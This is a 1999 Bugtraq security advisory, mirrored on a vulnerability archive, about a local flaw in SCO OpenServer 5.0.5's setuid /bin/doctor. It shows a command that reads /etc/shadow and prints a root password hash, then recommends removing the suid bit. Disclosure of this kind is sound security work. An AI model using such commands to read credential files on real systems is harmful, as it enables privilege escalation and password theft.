Computer Security
[EN] securityvulns.ru
no-pyccku







SCO OpenServer 5.0.5 /bin/doctor root compromise




SCO OpenServer 5.0.5 /bin/doctor root compromise





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Date: Вт, 07 сен 1999  19:44:42
  От: Brock Tellier <btellier@WEBLEY.COM>
Кому: BUGTRAQ@SECURITYFOCUS.COM
Тема: SCO OpenServer 5.0.5 /bin/doctor root compromise
--------------------------------------------------------------------------------


Greetings,


INFO:
There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
Just chmod -s until SCO comes out with a fix.  Although I certianly won't be changing it back to suid root anytime soon.  If a hole like this exists, there are undoubtedly countless more lurking within.  

Brock Tellier
Systems Administrator
Webley Systems




About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru